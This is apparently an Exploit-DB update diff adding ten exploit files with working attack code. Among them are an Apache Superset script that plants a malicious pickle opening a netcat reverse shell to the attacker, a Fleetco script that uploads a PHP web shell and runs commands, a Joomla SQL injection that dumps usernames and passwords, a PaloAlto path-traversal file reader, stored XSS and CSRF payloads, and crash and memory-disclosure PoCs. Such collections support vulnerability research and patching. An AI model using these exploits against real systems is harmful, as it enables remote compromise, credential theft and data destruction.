DB: 2018-12-04

10 changes to exploits/shellcodes

Mozilla Firefox 63.0.1 - Denial of Service (PoC)
Budabot 4.0 - Denial of Service (PoC)

CyberArk 9.7 - Memory Disclosure
Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution
Rockwell Automation Allen-Bradley PowerMonitor 1000 - Cross-Site Scripting
PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure
Joomla! Component JE Photo Gallery 1.1 - 'categoryid' SQL Injection
PHP Server Monitor 3.3.1 - Cross-Site Request Forgery
Apache Superset 0.23 - Remote Code Execution
Wordpress Plugins Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting

exploits/hardware/webapps/45928.txt

@@ -0,0 +1,21 @@
+# Exploit Title: Rockwell Automation Allen-Bradley PowerMonitor 1000 - Cross-Site Scripting
+# Date: 2018-11-27
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.rockwellautomation.com/
+# Version: 1408-EM3A-ENT B
+# Tested on: It is a proprietary devices: https://ab.rockwellautomation.com/zh/Energy-Monitoring/1408-PowerMonitor-1000
+# CVE : N/A
+
+# 1. Description:
+# In Rockwell Automation Allen-Bradley PowerMonitor 1000 web page,
+# user can add a new user by access the /Security/Security.shtm.
+# When users add a new user, the new user’s account will in the post data.
+# Attackers can inject malicious XSS code in user’s account parameter of post data.
+# The user’s account parameter will be stored in database, so that cause a stored XSS vulnerability.
+
+# 2. Proof of Concept:
+# Browse http://<Your Modem IP>/Security/Security.shtm
+# In page Security.shtm, add a new user
+# Send this post data:
+
+/Security/cgi-bin/security|0|0|<script>alert(123)</script>

exploits/linux/dos/45934.txt

@@ -0,0 +1,24 @@
+# Exploit Title: Budabot 4.0 - Denial of Service (PoC)
+# Date: 2018-10-15
+# Exploit Author: Ryan Delaney
+# Author Contact: ryan.delaney@owasp.org
+# Vendor Homepage: http://budabot.com/
+# Software Link: http://budabot.com/forum/viewtopic.php?f=8&t=1413
+# Version: 0.6 -> 4.0
+# Tested on: 4.0
+# CVE: CVE-2018-19290
+
+# 1. Description
+# In modules/HELPBOT_MODULE in Budabot 0.6 through 4.0, lax syntax validation
+# allows remote attackers to perform a command injection attack against the
+# PHP daemon with a crafted command, resulting in a denial of service or
+# possibly unspecified other impact. In versions before 3.0,
+# modules/HELPBOT_MODULE/calc.php has the vulnerable code; in 3.0 and above,
+# modules/HELPBOT_MODULE/HelpbotController.class.php has the vulnerable code.
+
+# 2. Proof of Concept
+
+Start the Budabot listener, set valid configuration options, and wait for
+the chatbot to announce it's ready in-game.
+Send the chatbot a private message containing "!calc 5 x 5", and the
+Budabot listener will terminate.

exploits/linux/webapps/45929.py

@@ -0,0 +1,64 @@
+# Exploit Title: PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure
+# Date: 2018-11-28
+# Exploit Author: paragonsec @ Critical Start
+# Vendor Homepage: https://live.paloaltonetworks.com/t5/Expedition-Migration-Tool/ct-p/migration_tool
+# Software Link: https://paloaltonetworks.app.box.com/s/davuvo65k727nm7feuug0d783zo6fjx8
+# Version: 1.0.106
+# Tested on: Linux
+# CVE : 2018-10142
+
+#!/usr/bin/env python
+ 
+import argparse
+import requests
+import sys
+import collections
+
+#Colors
+OKRED = '\033[91m'
+OKGREEN = '\033[92m'
+ENDC = '\033[0m'
+
+parser = argparse.ArgumentParser()
+parser.add_argument("--rhost", help = "Remote Host")
+parser.add_argument('--file', help = 'File to check (e.g /etc/passwd, /etc/shadow)')
+args = parser.parse_args()
+
+# Check to ensure at least one argument has been passed
+if len(sys.argv)==1:
+    parser.print_help(sys.stderr)
+    sys.exit(1)
+
+rhost = args.rhost
+rfile = args.file
+
+exploit_url = "http://" + rhost + "/API/process/checkPidStatus.php"
+ 
+headers = [
+    ('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'),
+    ('Accept', 'application/json, text/javascript, */*; q=0.01'),
+    ('Accept-Language', 'en-US,en;q=0.5'),
+    ('Accept-Encoding', 'gzip, deflate'),
+    ('Connection', 'close')
+]
+ 
+# probably not necessary but did it anyways
+headers = collections.OrderedDict(headers)
+ 
+# Setting up GET body parameters
+body = "pid=/../" + rfile
+
+print(OKGREEN + "Author: " + ENDC + "paragonsec @ Critical Start (https://www.criticalstart.com)")
+print(OKGREEN + "CVE: " + ENDC + "2018-10142")
+print(OKGREEN + "Description: " + ENDC + "Information Disclosure in Expedition Migration Tool")
+print(OKGREEN + "Vuln Versions: " + ENDC + "< 1.0.107\n")
+
+print(OKGREEN + "[+]" + ENDC + "Running exploit...")
+
+s = requests.Session()
+
+req = requests.post(exploit_url, headers=headers, data=body)
+if "false" not in req.text:
+    print(OKGREEN + "[+]" + ENDC + "Exploit worked! " + rfile + " exists!\n")
+else:
+    print(OKRED + "[!]" + ENDC + "File " + rfile + " does not exist!\n")

exploits/linux/webapps/45933.py

@@ -0,0 +1,97 @@
+# Exploit Title: Apache Superset 0.23 - Remote Code Execution
+# Date: 2018-05-17
+# Exploit Author: David May (david.may@semanticbits.com)
+# Vendor Homepage: https://superset.apache.org/
+# Software Link: https://github.com/apache/incubator-superset
+# Version: Any before 0.23
+# Tested on: Ubuntu 18.04
+# CVE-ID: CVE-2018-8021
+
+# I originally disclosed this to the Apache Superset team back in May, and the fix had already been 
+# in place, but not backported. As far as I know, this is the first weaponized exploit for this CVE.
+
+#!/usr/bin/env python
+
+import sys
+import os
+from lxml import html
+import requests
+
+# Change these values to your TCP listener
+myIP = '192.168.137.129'
+myPort = '8888'
+# Credentials must belong to user with 'can Import Dashboards on Superset' privilege
+username = 'test'
+password = 'test'
+
+# Logic in case script arguments are not given
+if len(sys.argv) < 3:
+	print('Verify you have started a TCP listener on the specified IP and Port to receive the reverse shell...')
+	print('Script Usage:')
+	print('./supersetrce.py <superset server ip> <superset port>')
+	sys.exit()
+	
+else:
+	# Script arguments
+	supersetIP = sys.argv[1]
+	supersetPort = sys.argv[2]
+	# Verify these URLs match your environment
+	login_URL = 'http://' + supersetIP + ':' + supersetPort + '/login/'
+	upload_URL = 'http://' + supersetIP + ':' + supersetPort + '/superset/import_dashboards'
+	
+	# Checks to see if file that we are going to write already exists in case this is run more than once
+	if os.path.isfile('evil.pickle'):
+		os.remove('evil.pickle')
+		
+	# Headers that we append to our POST requests
+	headers_dict = {
+		'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
+		'DNT': '1',
+		'Connection': 'close',
+		'Upgrade-Insecure-Requests': '1',
+	}
+	
+	# Creates evil pickle file and writes the reverse shell to it
+	evilPickle = open('evil.pickle','w+')
+	evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc ' + myIP + ' ' + myPort + ' 1>/tmp/backpipe\'\ntR.')
+	evilPickle.close()
+	
+	# Start a session so we have persistent cookies
+	session = requests.session()	
+	
+	# Grabs the Login page to parse it for its CSRF token
+	login_page = session.get(login_URL)
+	if login_page.status_code != 200:
+		print('Login page not reached, verify URLs in script')
+	login_tree = html.fromstring(login_page.content)
+	csrf_token = login_tree.xpath('//input[@id="csrf_token"]/@value')
+	
+	# Form data that is sent in the POST request to Login page
+	login_data = {
+		'csrf_token' : csrf_token,
+		'username' : username,
+		'password' : password,
+	}
+	
+	# Adds the Referer header for the login page
+	headers_dict['Referer'] = login_URL
+	
+	# Logon action
+	login = session.post(login_URL, headers=headers_dict, data=login_data)	
+	
+	# Grabs the Upload page to parse it for its CSRF token
+	upload_page = session.get(upload_URL)
+	if upload_page.status_code != 200:
+		print('Upload page not reached, verify credentials and URLs in script')
+	upload_tree = html.fromstring(upload_page.content)
+	csrf_token = upload_tree.xpath('//input[@id="csrf_token"]/@value')
+	
+	# Adds the Referer header for the Upload page
+	headers_dict['Referer'] = upload_URL
+	
+	# Upload action
+	upload = session.post(upload_URL, headers=headers_dict, data={'csrf_token':csrf_token}, files={'file':('evil.pickle',open('evil.pickle','rb'),'application/octet-stream')})
+	
+	# Closes the session
+	session.close()
+	sys.exit()

exploits/php/webapps/45927.py

@@ -0,0 +1,77 @@
+# Exploit Title: Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution
+# Date: 2018-11-23
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Contact: https://pentest.com.tr
+# Vendor Homepage: https://www.fleetco.space
+# Software Link: http://www.fleetco.space/download/215/
+# Version: v1.2
+# Category: Webapps
+# Tested on: XAMPP for Linux 1.7.2
+# Software Description : Fleetco FMM is a free, web-based vehicle fleet maintenance management
+# system written in PHP with MySQL database backend.
+# Description : Fleetco 1.2 and lower versions allows to upload arbitrary ".php" files which
+# leads to a remote command execution on the remote server. Any authorized user is enough to exploit.
+# ==================================================================
+# PoC:
+
+#!/usr/bin/python
+
+import mechanize
+import sys
+import cookielib
+import requests
+import colorama
+from colorama import Fore
+
+print "\n[*] Fleetco Fleet Maintenance Management v1.2 - Remote Code Execution"
+print "[*] Vulnerability discovered by AkkuS"
+print "[*] My Blog - https://www.pentest.com.tr\n"
+if (len(sys.argv) != 2):
+    print "[*] Usage: poc.py <RHOST>"
+    exit(0)
+ 
+rhost = sys.argv[1]
+
+# User Information Input
+UserName = str(raw_input("User Name: "))
+Password = str(raw_input("Password: "))
+
+# Login into site
+print(Fore.BLUE + "+ [*] Loging in...")
+br = mechanize.Browser()
+br.set_handle_robots(False)
+
+# Cookie Jar
+cj = cookielib.LWPCookieJar()
+br.set_cookiejar(cj)
+
+br.open("http://"+rhost+"/login.php")
+assert br.viewing_html()
+br.select_form(name="form1")
+br.select_form(nr=0)
+br.form['username'] = UserName
+br.form['password'] = Password
+br.submit()
+
+# Where are you
+title = br.title()
+print (Fore.YELLOW + "+ [*] You're in "+title+" section of the app now")
+
+# Create Accident Records with multipart/form-data to RCE
+rce_headers = {"Content-Type": "multipart/form-data; boundary=---------------------------10664657171782352435254769348"}
+rce_data="-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Fleet_1\"\r\n\r\nCargo Carriers\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Vehicle_1\"\r\n\r\nBF1470\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Type_1\"\r\n\r\nLorry\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Date_1\"\r\n\r\n11/07/2018\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"type_Date_1\"\r\n\r\ndate2\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"type_Time_1\"\r\n\r\ntime\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Driver_1\"\r\n\r\nAntony Croos\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Details_1\"\r\n\r\ntest\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"type_Images_1\"\r\n\r\nupload2\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Images_1\"; filename=\"RCE.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"</pre>\"; die; }?>\n\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"filename_Images_1\"\r\n\r\nRCE.php\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_EnteredBy_1\"\r\n\r\nMark Croos\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_SysDate_1\"\r\n\r\n2018-11-23 14:58:09\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"a\"\r\n\r\nadded\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"rndVal\"\r\n\r\n0.8040138072331872\r\n-----------------------------10664657171782352435254769348--\r\n"
+
+upload = requests.post("http://"+rhost+"/accidents_add.php?submit=1&", headers=rce_headers, cookies=cj, data=rce_data)
+if upload.status_code == 200:
+   print (Fore.GREEN + "+ [*] Shell successfully uploaded!")
+
+# Shell validation and exploit
+while True:
+      shellctrl = requests.get("http://"+rhost+"/files/RCE.php")
+      if shellctrl.status_code == 200:
+         Command = str(raw_input(Fore.WHITE + "shell> "))
+     URL = requests.get("http://"+rhost+"/files/RCE.php?cmd="+Command+"")
+            print URL.text
+      else:
+         print (Fore.RED + "+ [X] Unable to upload or access the shell")
+         sys.exit()

exploits/php/webapps/45930.pl

@@ -0,0 +1,55 @@
+# Exploit Title: Joomla! Component JE Photo Gallery 1.1 - SQL Injection
+# Dork: N/A
+# Date: 2018-11-26
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://joomlaextensions.co.in
+# Software Link: http://joomlaextensions.co.in/download/1387375463_JE%20PhotoGallery%20(%20J-%203.0%20).zip
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1) 
+
+#!/usr/bin/perl -w
+
+sub clear{
+system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
+clear();
+print "
+                                     ./
+                                   (o o)
+###############################oOOo-(-)-oOOo###############################
+        ______  _______ ___    _   __   _____ _______   ___________    _   __ 
+       /  _/ / / / ___//   |  / | / /  / ___// ____/ | / / ____/   |  / | / / 
+       / // /_/ /\__ \/ /| | /  |/ /   \__ \/ __/ /  |/ / /   / /| | /  |/ /
+     _/ // __  /___/ / ___ |/ /|  /   ___/ / /___/ /|  / /___/ ___ |/ /|  /
+    /___/_/ /_//____/_/  |_/_/ |_/   /____/_____/_/ |_/\____/_/  |_/_/ |_/
+  
+                                 WWW.IHSAN.NET                               
+                                       +                                     
+	   Joomla! Component JE Photo Gallery 1.1 - SQL Injection         
+############################################################################
+";
+
+use LWP::UserAgent;
+print "\nTarget:[http://site.com/path/]: ";
+chomp(my $target=<STDIN>);
+print "\n[!] Exploiting Progress...\n";
+print "\n";
+$UT="wizjk_users";
+$S="index.php?";
+$I="tmpl=component&option=com_jephotogallery&view=category&task=fetchimage&categoryid=";
+$E="%2d%32%39%20%55%4e%69%6f%6e%20%73%65%4c%45%43%54%20%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%75%73%65%72%6e%61%6d%65%2c%30%78%33%61%2c%70%61%73%73%77%6f%72%64%29%20%46%52%4f%4d%20".$UT."%29%2c%30%2c%30%2c%30%2c%30%2c%30%2c%30%2c%30%2c%30%2c%4e%75%4c%4c%2c%30%2c%30%2d%2d%20%2d";
+$SIE = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$SIE->agent('Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0');
+$host = $target . "".$S."".$I."".$E."";
+$res = $SIE->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content; if ($answer =~/{"id":"(.*?)"/){ 
+print "[+] Success !!!\n";
+print "\n[+] Detail : $1\n";
+print "\n";
+}
+else{print "\n[-]Not found.\n";
+}

exploits/php/webapps/45932.txt

@@ -0,0 +1,77 @@
+# Exploit Title: PHP Server Monitor 3.3.1 - Cross-Site Request Forgery
+# Exploit Author: Javier Olmedo
+# Website: https://www.sidertia.com
+# Date: 2018-11-28
+# Google Dork: N/A
+# Vendor: https://www.phpservermonitor.org/
+# Software Link: https://github.com/phpservermon/phpservermon/releases/tag/v3.3.1
+# Affected Version: 3.3.1 and possibly before
+# Patched Version: update to 3.3.2
+# Category: Web Application
+# Platform: Windows & Ubuntu
+# Tested on: Win10x64 & Kali Linux
+# CVE: N/A
+# References:
+# https://github.com/phpservermon/phpservermon/issues/670
+# https://www.sidertia.com/Home/Community/Blog/2018/11/28/Corregidas-las-vulnerabilidades-CSRF-descubiertas-en-PHP-Server-Monitor
+   
+# 1. Technical Description:
+# PHP Server Monitor version 3.3.1 and possibly before are affected by multiple
+# Cross-Site Request Forgery vulnerability, an attacker could remove users, logs,
+# and servers.
+ 
+# 2.1 Proof Of Concept (Delete User):
+
+(Method 1)
+Use Google URL Shortener (or similar) to shorten the next url (http://[PATH]/?&mod=user&action=delete&id=[ID]) and send it to the victim.
+
+(Method 2)
+Use next form and send it tho the victim.
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://[PATH]/">
+      <input type="hidden" name="mod" value="user" />
+      <input type="hidden" name="action" value="delete" />
+      <input type="hidden" name="id" value="[ID]" />
+      <input type="submit" value="Delete User" />
+    </form>
+  </body>
+</html>
+
+# 2.2 Proof Of Concept (Delete Server):
+
+(Method 1)
+Use Google URL Shortener (or similar) to shorten the next url (http://[PATH]/?&mod=server&action=delete&id=[ID]) and send it to the victim.
+
+(Method 2)
+Use next form and send it tho the victim.
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://[PATH]/">
+      <input type="hidden" name="mod" value="server" />
+      <input type="hidden" name="action" value="delete" />
+      <input type="hidden" name="id" value="[ID]" />
+      <input type="submit" value="Delete Server" />
+    </form>
+  </body>
+</html>
+
+# 2.3 Proof Of Concept (Delete All Logs):
+
+(Method 1)
+Use Google URL Shortener (or similar) to shorten the next url (http://[PATH]/?&mod=server_log&action=delete) and send it to the victim.
+
+(Method 2)
+Use next form and send it tho the victim.
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://[PATH]/">
+      <input type="hidden" name="mod" value="server&#95;log" />
+      <input type="hidden" name="action" value="delete" />
+      <input type="submit" value="Delete All Logs" />
+    </form>
+  </body>
+</html>

exploits/php/webapps/45935.txt

@@ -0,0 +1,33 @@
+# Exploit Title: Wordpress Plugins Advanced-custom-fields 5.7.7 - Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2018-12-02
+# Exploit Author: Loading Kura Kura
+# Vendor Homepage: https://www.advancedcustomfields.com/]
+# Software Link: https://www.advancedcustomfields.com/
+# Version: 5.7.7
+# Tested on: Win10 x64/Kali linux x64
+# CVE : N/A
+
+# description:
+# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins easy testimonials 3.2.
+# Three parameters(_ikcf_client _ikcf_position _ikcf_other) have Cross-Site Scripting.
+
+# Paramater: acf_fields[11][label]
+# PoC 
+
+POST /wordpress/wp-admin/post.php HTTP/1.1
+Host: localhost
+Content-Length: 2838
+Cache-Control: max-age=0
+Origin: http://localhost
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer: http://localhost/wordpress/wp-admin/post.php?post=8&action=edit
+Accept-Encoding: gzip, deflate
+Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6
+Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1543850245%7CLBSY8ANOj9TKCX2YpnzKJoZ5N75oRW4ZGkZZrw5INPt%7C74dd4284fad8e2f658d13db3d669d0d61976654b4b9e7b4a820b0156fb018264; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1543850245%7CLBSY8ANOj9TKCX2YpnzKJoZ5N75oRW4ZGkZZrw5INPt%7Cd0b0455678fae203a81b5c23b42dbfa51b0ab665e33607d2b09b1d5d62cc36be; wp-settings-time-1=1543678278; wp-settings-1=mfold%3Do; hblid=gR3SowbFiR0QuMDg3m39N0I6Bo2jr38A; olfsk=olfsk8076045099904943; _gcl_au=1.1.201976856.1543314650
+Connection: close
+
+_wpnonce=415211ddca&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D8%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=acf-field-group&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D8%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D8%26action%3Dedit&post_ID=8&meta-box-order-nonce=2cc12cc441&closedpostboxesnonce=bbd0be706b&post_title=xss&samplepermalinknonce=4f1f2ec280&_acf_screen=field_group&_acf_post_id=8&_acf_nonce=191e753914&_acf_validation=0&_acf_changed=1&_acf_delete_fields=0%7C9&original_publish=Update&save=Update&acf_fields%5B11%5D%5BID%5D=11&acf_fields%5B11%5D%5Bkey%5D=field_5c02a79cc0f83&acf_fields%5B11%5D%5Bparent%5D=8&acf_fields%5B11%5D%5Bmenu_order%5D=0&acf_fields%5B11%5D%5Bsave%5D=settings&acf_fields[11][label]=%3Cscript%3Ealert%28%22loadingkurakura%22%29%3C%2Fscript%3E&acf_fields%5B11%5D%5Bname%5D=%3Cscript%3Ealert%28%22loadingkurakura1%22%29%3C%2Fscript%3E&acf_fields%5B11%5D%5Btype%5D=text&acf_fields%5B11%5D%5Binstructions%5D=&acf_fields%5B11%5D%5Brequired%5D=0&acf_fields%5B11%5D%5Brequired%5D=1&acf_fields%5B11%5D%5Bdefault_value%5D=&acf_fields%5B11%5D%5Bplaceholder%5D=&acf_fields%5B11%5D%5Bprepend%5D=&acf_fields%5B11%5D%5Bappend%5D=&acf_fields%5B11%5D%5Bmaxlength%5D=&acf_fields%5B11%5D%5Bconditional_logic%5D=0&acf_fields%5B11%5D%5Bwrapper%5D%5Bwidth%5D=&acf_fields%5B11%5D%5Bwrapper%5D%5Bclass%5D=&acf_fields%5B11%5D%5Bwrapper%5D%5Bid%5D=&acf_fields%5B10%5D%5BID%5D=10&acf_fields%5B10%5D%5Bkey%5D=field_5c02a7abc0f84&acf_fields%5B10%5D%5Bparent%5D=8&acf_fields%5B10%5D%5Bmenu_order%5D=1&acf_fields%5B10%5D%5Bsave%5D=meta&acf_fields%5B12%5D%5BID%5D=12&acf_fields%5B12%5D%5Bkey%5D=field_5c02a7abc0f84&acf_fields%5B12%5D%5Bparent%5D=8&acf_fields%5B12%5D%5Bmenu_order%5D=2&acf_fields%5B12%5D%5Bsave%5D=meta&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_0%5D%5Bparam%5D=post_type&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_0%5D%5Boperator%5D=%3D%3D&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_0%5D%5Bvalue%5D=post&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_1%5D%5Bparam%5D=post_type&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_1%5D%5Boperator%5D=%3D%3D&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_1%5D%5Bvalue%5D=post&acf_field_group%5Bactive%5D=0&acf_field_group%5Bactive%5D=1&acf_field_group%5Bstyle%5D=default&acf_field_group%5Bposition%5D=normal&acf_field_group%5Blabel_placement%5D=top&acf_field_group%5Binstruction_placement%5D=label&acf_field_group%5Bmenu_order%5D=0&acf_field_group%5Bdescription%5D=ddd&acf_field_group%5Bhide_on_screen%5D=&acf_field_group%5Bhide_on_screen%5D%5B%5D=the_content&acf_field_group%5Bkey%5D=group_5c02a6cfa31d6&post_name=group_5c02a6cfa31d6

exploits/windows/dos/45931.txt

@@ -0,0 +1,94 @@
+# Exploit Title: Mozilla Firefox 63.0.1 - Denial of Service (PoC)
+# Date: 2018-11-29
+# Exploit Author: SAIKUMAR CHEBROLU
+# Vendor Homepage: https://www.mozilla.org/en-US/firefox/new/
+# Bugzilla report: https://bugzilla.mozilla.org/show_bug.cgi?id=1504512
+# Version: Firefox 63.0.1
+# Tested on: Windows 10
+# CVE : No CVE is been assigned to this bug.
+
+# To exploit this vulnerability please follow the below steps.
+# Firefox is being crashed, when it tried to process the chunked data. when Transfer-Encoding header 
+# is used, we suppose to send the data in the chunks form. When all the chunks being transferred, 
+# we need to tell the client with chunk length zero. so that it understands chunked stream completed. 
+
+# But if we send the data after sending zero length, then firefox not able to understand it, 
+# and it being crashed.
+
+# Example:
+
+5
+
+Don't
+
+5
+
+be af
+
+5
+
+firef
+
+5
+
+ox is
+
+0      
+
+Crash       (after saying it is end, we still sending some data)    
+
+\r\n
+
+# here we are saying no chunked data after this.so that it should end with \r\n. But we 
+# are sending some data after this also. Like
+
+# Steps to reproduce the crash
+
+1)download the firefoxcrash.txt
+
+2)nc -lp 8000 < firefoxcrash.txt
+
+3)browe the url from firefox like  http://localhost:8000
+
+4)then close the netcat client. then you will obserev the firefox crash.
+
+# fireforcrash.txt
+
+HTTP/1.1 200 ok
+Content-type: application/octet-stream
+Content-disposition: attachment; filename="crash.txt"
+Transfer-Encoding: chunked
+Connection: close
+
+5
+I am 
+5
+ be a
+5
+fraid
+5
+ to l
+5
+ook a
+5
+t thi
+5
+s mes
+5
+sage.
+5
+ It i
+5
+s com
+5
+plete
+5
+ly ha
+5
+rmles
+5
+s. Re
+5
+ally!
+0
+foobar

exploits/windows/remote/45926.py

@@ -0,0 +1,55 @@
+# Exploit Title: CyberArk 9.7 - Memory Disclosure
+# Date: 2018-06-04
+# Exploit Author: Thomas Zuk (@Freakazoidile)
+# Vendor Homepage: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/
+# Version: < 9.7 and < 10
+# Tested on: Windows 2008, Windows 2012, Windows 7, Windows 8, Windows 10
+# CVE: CVE-2018-9842
+
+# Description: There currently exists a general advisory for the CVE with a description of exploitation and how 
+# to reproduce, but without full exploit code. I have developed a working, reliable standalone Python exploit that 
+# can be successfully used by modifying only the target IP address. Attached to this email submission is the working exploit code. 
+
+#!/usr/bin/python
+
+import socket
+import os
+import sys
+
+# Exploit script for CVE-2018-9842
+# Original vulnerability advisory: https://www.redteam-pentesting.de/advisories/rt-sa-2017-015
+# Author: Thomas Zuk (@Freakazoidile) - Security Consultant @ Packetlabs ltd.
+
+# Linux cmd line manual test: cat logon.bin | nc -vv IP 1858 | xxd
+# paste the following bytes into a hexedited file named logon.bin:
+#fffffffff7000000ffffffff3d0100005061636c695363726970745573657200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020202020ffffffff0000000000000000000073000000cececece00000000000000000000000000000000303d4c6f676f6efd3131353d372e32302e39302e3238fd36393d50fd3131363d30fd3130303dfd3231373d59fd3231383d5041434c49fd3231393dfd3331373d30fd3335373d30fd32323d5061636c6953637269707455736572fd3336373d3330fd0000
+#
+#
+
+ip = "10.107.32.21"
+port = 1858
+
+# Cyber Ark port 1858 is a proprietary software and protocol to perform login and administrative services.
+# The below is a sample login request that is needed to receive the memory
+
+pacli_logon = "\xff\xff\xff\xff\xf7\x00\x00\x00\xff\xff\xff\xff\x3d\x01\x00\x00\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x20\x20\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x00\x00\x00\xce\xce\xce\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x3d\x4c\x6f\x67\x6f\x6e\xfd\x31\x31\x35\x3d\x37\x2e\x32\x30\x2e\x39\x30\x2e\x32\x38\xfd\x36\x39\x3d\x50\xfd\x31\x31\x36\x3d\x30\xfd\x31\x30\x30\x3d\xfd\x32\x31\x37\x3d\x59\xfd\x32\x31\x38\x3d\x50\x41\x43\x4c\x49\xfd\x32\x31\x39\x3d\xfd\x33\x31\x37\x3d\x30\xfd\x33\x35\x37\x3d\x30\xfd\x32\x32\x3d\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\xfd\x33\x36\x37\x3d\x33\x30\xfd\x00\x00"
+
+
+for iteration in range(0, 110):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((ip, port))
+    s.send(pacli_logon)
+
+    # recieve response
+    s.recv(200)
+    reply = s.recv(1500)
+
+    # write responses to file
+    file = open("cyberark_memory", "a")
+
+    file.write("received: \n")
+    file.write(reply)
+    file.write("\n\n\n")
+    file.close()
+
+    s.close()

files_exploits.csv

@@ -6202,6 +6202,8 @@ id,file,description,date,author,type,platform,port
 45919,exploits/linux/dos/45919.c,"Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer",2018-11-30,"Jinbum Park",dos,linux,
 45923,exploits/windows/dos/45923.html,"VBScript - 'OLEAUT32!VariantClear' and 'scrrun!VBADictionary::put_Item' Use-After-Free",2018-11-30,"Google Security Research",dos,windows,
 45924,exploits/windows/dos/45924.html,"VBScript - 'rtFilter' Out-of-Bounds Read",2018-11-30,"Google Security Research",dos,windows,
+45931,exploits/windows/dos/45931.txt,"Mozilla Firefox 63.0.1 - Denial of Service (PoC)",2018-12-03,"SAIKUMAR CHEBROLU",dos,windows,
